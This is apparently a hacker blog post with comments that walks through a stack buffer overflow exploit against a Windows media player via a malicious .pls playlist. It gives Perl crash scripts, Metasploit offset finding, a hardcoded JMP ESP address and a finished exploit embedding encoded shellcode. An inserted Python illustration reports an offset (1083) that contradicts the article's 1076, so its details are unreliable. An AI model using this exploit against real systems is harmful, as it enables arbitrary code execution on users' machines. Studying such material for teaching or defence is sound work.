Boring days, so I thought I'd write something that will give me some peace. Yeah, I just wanna show you guys
a quick DEMO of finding a buffer overflow vulnerability and exploiting it. Though I say it's a quick demonstration, it took
me some time to write all this up.
I recently wrote a BoF exploit for caster ripper, so I will use it in this demonstration.
Before starting, I want to tell you that to follow what I'm doing here you need some background on this subject
and to be familiar with the tools that help me in this process.
I will use these tools throughout the demo:
1-Ollydbg (which i find cooler than windbg)
2-Metasploitframework (An awesome tool/framework)
3-Windows Xp installed on vmware
So let's attach our vulnerable program to the debugger, send our junk data to it and crash it.
Hopefully this small Perl script will crash it.
We are sending 5000 x41 bytes, which is nothing but 5000 A's.
#!/usr/bin/perl
use strict;
use warnings;
my $file = "crush.pls";
my $junk = "\x41" x 5000;   # 5000 'A' bytes
open(my $FILE, '>', $file) or die "Cannot open $file: $!";
binmode($FILE);             # write the bytes exactly as built
print $FILE $junk;
close($FILE);
print "m3u File Created successfully\n";
After the crash, the CPU registers look like this.
We can see EIP is overwritten with 41414141, which is AAAA from our buffer.
Great, we are now controlling EIP, so let's find the exact location to place our shellcode.
Let's modify our Perl script to send another buffer to the program and crash it. Now we are sending 25000 A's followed by 5000 B's.
#!/usr/bin/perl
use strict;
use warnings;
my $file  = "crush25000.pls";
my $junk  = "\x41" x 25000;  # 25000 'A' bytes
my $junk2 = "\x42" x 5000;   # 5000 'B' bytes
open(my $FILE, '>', $file) or die "Cannot open $file: $!";
binmode($FILE);
print $FILE $junk . $junk2;
close($FILE);
print "m3u File Created successfully\n";
Great, now EIP is overwritten with 42424242, which is nothing but BBBB. So now we know the offset to EIP is between 25000 and 30000.
In order to find the exact location, we'll use Metasploit. I'm going to use the Windows version of Metasploit,
which is located in C:\program files\metasploit\framwork3
C:\program files\metasploit\framwork3\msf3\tools\pattern_create.rb 5000
It will create a unique 5000-byte pattern.
So let's modify our Perl script again, replacing the B's with the pattern we just created.
#!/usr/bin/perl
use strict;
use warnings;
my $file  = "crush25000.pls";
my $junk  = "\x41" x 25000;  # 25000 'A' bytes
my $junk2 = "<paste the 5000-byte pattern_create.rb output here>";
open(my $FILE, '>', $file) or die "Cannot open $file: $!";
binmode($FILE);
print $FILE $junk . $junk2;
close($FILE);
print "m3u File Created successfully\n";
So now EIP is overwritten with 0x42316b42, a piece of our unique pattern.
Let's find the offset of it. Here we go, the offset is 1076.
C:\program files\metasploit\framwork3\msf3\tools\pattern_offset.rb 0x42316b42 5000
1076
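As an added illustration (not the author's script and not Metasploit's own code), this Python reimplements what pattern_create.rb and pattern_offset.rb do with their default character sets, run against the EIP value quoted above; the function names pattern_create, find_offset and junk_length are my own. It searches for the dword both as it sat in memory (little-endian) and byte-reversed, exactly the two checks a practitioner wants before trusting an offset.

```python
import struct

# Default character sets used by Metasploit's pattern_create.rb / pattern_offset.rb
UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def pattern_create(length):
    """Return the cyclic pattern Aa0Aa1...Az9Ba0... cut (or wrapped) to `length` bytes."""
    full = "".join(u + l + d for u in UPPER for l in LOWER for d in DIGITS)
    reps = length // len(full) + 1          # the 20280-byte pattern repeats if asked for more
    return (full * reps)[:length].encode()


def find_offset(eip, length):
    """Offset of the 4 bytes that ended up in EIP, or -1 if they are not in the pattern.

    x86 stores the dword little-endian, so EIP=0x42316b42 means the file
    contained the byte string 'Bk1B'; that is what we search for.
    """
    return pattern_create(length).find(struct.pack("<I", eip))


def find_offset_reversed(eip, length):
    """Same search with the bytes in the opposite order, for a value that was
    copied byte-reversed from the debugger (pattern_offset.rb tries this too)."""
    return pattern_create(length).find(struct.pack(">I", eip))


def junk_length(eip, prefix, length):
    """Bytes to send before the saved return address: the fixed prefix
    (the 25000 'A's in the article) plus the offset inside the pattern."""
    off = find_offset(eip, length)
    if off == -1:
        raise ValueError("0x%08x not found in a %d-byte pattern" % (eip, length))
    return prefix + off


if __name__ == "__main__":
    eip = 0x42316B42                          # value quoted in the article
    print("offset of 0x%08x: %d" % (eip, find_offset(eip, 5000)))
    print("byte-reversed match: %d" % find_offset_reversed(eip, 5000))
    print("total junk before EIP: %d" % junk_length(eip, 25000, 5000))
```

With the default sets this reports 1083 for 0x42316b42; if the number you compute differs from the one you expected, confirm which pattern actually went into the file before building the final buffer.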
Jumping to the shellcode.
Executable modules
Because this is a quick demonstration I won't go into much detail about this. To find a JMP address you can use findjmp.c (which you can find on the internet; just compile it and run it).
Usage of findjmp ( C:\findjmp kernel32.dll esp)
So I'm going to use this address, 0x7D113B1F JMP ESP from SHELL32.dll on WinXP SP3. You can replace this with some other address.
So let's write up the complete exploit. That's it XD. Don't worry, I skipped a lot of stuff in this because it's just a demo. lol. peace.
#!/usr/bin/perl
use strict;
use warnings;
my $file = "d3b4g.pls";
my $junk = "A" x 26076;                 # 25000 + 1076: fills the buffer up to the saved return address
my $eip  = pack('V', 0x7D113B1F);       # JMP ESP from SHELL32.dll WinXP SP3
my $shellcode = "\x90" x 25;            # NOP sled
# windows/exec - 144 bytes
# Thanks to http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
open(my $FILE, '>', $file) or die "Cannot open $file: $!";
binmode($FILE);                         # keep the shellcode bytes untouched
print $FILE $junk . $eip . $shellcode;  # junk, then the return address, then the payload ESP points at
close($FILE);
print "pls File Created successfully\n";

Nice article!
You may want to have a look at pvefindaddr (plugin for Immunity Debugger):
- you can create and find metasploit patterns from within the debugger using !pvefindaddr :
* !pvefindaddr pattern_create
* !pvefindaddr pattern_offset
* !pvefindaddr findmsp
(useful to run when the application crashed and you have used a metasploit pattern)
- If you use a metasploit pattern in your pls file, you can find all required offsets (and even a suggestion on how your exploit should look) using !pvefindaddr suggest
- … (many more features)
You can download the (free) plugin from
http://www.corelan.be:8800/index.php/security/pvefindaddr-py-immunity-debugger-pycommand/
Final note: findjmp does not always return reliable addresses, because sometimes DLLs get rebased.
It's better to look for addresses when the debugger is attached to the application. Let's say you want to find jmp esp, you can do
!pvefindaddr j esp
(and then open file j.txt to get all addresses)
Nice plugin mate, I will definitely try it.
It will make the exploit writing process much easier. Thanks for the tip.
PS. I wrote that article within 20 min, so I skipped a lot of stuff; I will write something worth reading in the near future.